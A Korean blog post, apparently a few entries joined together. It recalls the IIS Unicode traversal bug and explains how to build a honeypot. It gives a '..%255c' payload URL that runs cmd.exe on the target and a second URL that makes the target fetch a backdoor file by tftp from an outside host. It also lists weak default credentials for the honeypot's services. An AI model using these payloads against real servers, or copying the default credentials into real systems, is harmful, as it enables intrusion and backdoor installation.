표창원 교수님 말씀 사회적 약자를 한번 되돌아 볼 기회다.

참 고전적인 버그다. 윈도우서버 2000에서 발생되었고 주로 2000년도 2001년 2002년까지 활동하였다. 윈도우 서버군을 디폴트로 설치하면 iis서버가 자동으로 구동 되었고, 자동으로 80포트를 통해 자동으로 10분 이내에 감염이 되었었다. 그만큼 숙주 서버가 많았다고 보면 된다.

그리고 MS에서 패치가 제대로 이루어지지 않아 지금 생각하면 당시 MS에서도 보안 전문 인력이 지금 처럼 많이 않았을거 같다.

exploit payload는 굉장히 단순하다. 타겟호스트에 스크립트 폴더를 이용하여 유니코드 문자열을 통해 cmd.exe이 사용 가능하다.

 http://target_host/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

아래는 tftp(udp 69번)프로토콜을 통해 지금이라면 RAT와 같은 백도어를 업로드 하는 명령어다.

http://target_host/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ tftp+-i+tftp_host+get+"upload_file

당시 윈도우 서버는 신선했다. MS에서 유닉스에 대항하여 서버OS를 만들었다는것도 대단하였고, GUI환경과 Active Directory신선한 개념을 들고 나왔다. 이걸로 인해 한때 붐이 일어나기도 했다. 지금 생각해보면 영업빨이 아닌가 하는 생각도 든다.

문제가 많았다. 보안적인 문제나 안정성, 서버OS인데도 블루스크린이 가끔 뜨기도 하였다. 그것보다 가장 큰 문제는 퍼포먼스 였다. GUI를 올리고 사용하다보니 당시 사양이 뛰어나지 않아서 성능성 굉장한 문제가 발생하였다.

당시 리눅스나 유닉스에서 놀던 해커들이 갑자기 윈도우시스템에 관심을 가지기 시작했다. 외국에서는 불가리아 해커 구닌스키가 유명하였고, 국내에서는 바**님이나 가***님이 선두로 이끌었고, ntfaq.co.kr 커뮤니티가 활발이 활동 하였다. 문제가 왜 심각 하였나면 MS의 패치가 제대로 이루어 지지 않아 몇번의 패치가 되어도 우회되는 취약점이 계속 발생 하였다.

즉 다시 말하면 당시 iis를 사용하였던 서버는 거의 다 털렸다고 보면 된다. snort나 오픈소스 웹방화벽이 있었지만 둘다 제구실을 못하던 시절이다.

취약점 스캐닝 툴로는 쉐도우 시스템 스캐너(SSS)라고  러시아산이 유명했고, 맥아피의 cybercop이나 랜가이드 같은 툴이 나오기 시작 하였다.

그리고 취약점의 전체 Lifecycle도 알수 있었다. 그전에 활용되던 다른 remote 관련 취약점들도 이정도까지 하나의 Lifecycle 형태로 돌지는 않았다.

제로데이-> 1 day -> 자동화 공격툴 -> 웜-> 소멸

웜이 나오면 그뒤로 점차 피해가 줄어드는 추세였다. 코드레드, 코드블루, nimda 다 iis유니코드의 변형들이다.

요즘 랜섬웨어가 하도 유행중이라고, 하는데 랜섬웨어가 활발이 활동 할수록 일반 유저들의 관심도가 많아지고 보안의식 또한 좋아진다. 그리고 기존의 중국, 북한등 해커들 입장에서는 공격이 점차 점차 어려워 질수도 있지 않을까 하는 생각도 든다.

아직도 윈도우 서버를 운영하기에는 조금 꺼리는 면이 있다. 업데이트를 하면 리부팅을 한다던지 레지스트리나 시스템파일에 계정으로 설치 하여도 막 설치되는 경우가 많다. 장애나 퍼포먼스에서는 아직도 원인 파악이 유닉스보다는 조금 힘든 부분도 있다. 하지만 엄청난 고수인 경우에는 iis가 엄청난 퍼포먼스를 낸다고 하던데 한번도 본적은 없다.

이론적으로 허니팟을 만드는 아주 다양한 방법이 존재 한다. 그런 관련 논문도 수도 없이 본거 같다. 요즘 라즈베이파이나 미니PC같은 저 전력 저 비용으로도 구현을 하는거 같다.

허니팟은 일명 꿀단지다. 취약한 서버를 구축해놓고 공격자들의 행위나 패턴을 분석한다. 그럼 도대체 어떻게 구축해야 되나? 의문이 생길것이다.

침해사고 발생 유형은 3가지 정도로 본다. 자동화 도구에 의한 침투, 해커가 수동으로 행위 발생 후 침투, PC 침투 후 서버 침투

PC단은 RAT툴 같은 종류에 감염되어야 되고 서버팜 전체를 구축해야 되는 부분도 있어서 좀 힘들고, 해커가 수동으로 행위를 발생시키는 부분도 홈페이지나 DB도 그럴싸 하게 구축해야 된다.

그래서 우리는 가장 취약한 자동화 도구에 의한 침투를 구축해볼것이다.  자동화 도구는 python같은 스크립트로 멀티 쓰레드로 구현하여 IP대역대로 공격 패킷을 던진 뒤 응답 코드를 보고 판단하는 것이다.

최근 침해사고 대응협의회가서 다른 섹션은 다 못들었지만 워터홀 공격(Drive by Download), APT, 랜섬웨어에 대한 기술적 감염방식 솔루션 소개가 대부분이 였다.

랜섬웨어와 같은 워터홀 공격을 위해서는 경유지가 엄청나게 필요하다. 배포IP가 공유되면 바로 차단되기 때문이다. 그런 경우지와 유포지를 찾기 위해서 자동화 점검도구로 서버를 스캔한다.

서버에 저장된 정보보다는 2차적 행위를 위한 서버의 리소스를 먹는게요즘 추세이다. 악성코드 배포, 비트코인 체굴, DDoS Agent 등 여러가지 2차 적인 행위가 가능하다.

실제 구축은 어떻게 하면 되나? 침해사고 발생 유형별로 졸라 취약하게 만들어 놓으면 된다.

1] ssh, telnet 외부 오픈 후 쉬운계정 접속가능 (root / 1234) (oracle/oracle)

2] sendmail 구축 후 릴레이 정책 미적용

3] 워드프레스, Apache Struct, Fckediter, 제로보드 등 리모트 취약점에 취약한 구버전 구축

4] 관리자 페이지 외부 오픈 기본 패스워드 사용 tomcat, weblogic, phpmyadmin (oracle /   welcome1)

5] sql injection도 웹방화벽이나 웹로그에 오토의 흔적들이 보인다. 그런 유형에 당하도록  구축

6] 공유기나 허브 외부접근 가능 기본 패스워드 사용 (admin/ admin)

저렇게 구축한 뒤 떡밥을 기다리면 된다. 저런류를 개별적으로 다 따라 구축해 놓고, 관련 연구자료나 논문으로 사용도 가능하다.

꼭 이글 보고 그대로 따라하는 얼척은 없길 바란다. 허니팟 구축 방법이지 해킹하는 방법이 아니다. 자기가 한 행동에는 자기가 책임을 져야 된다.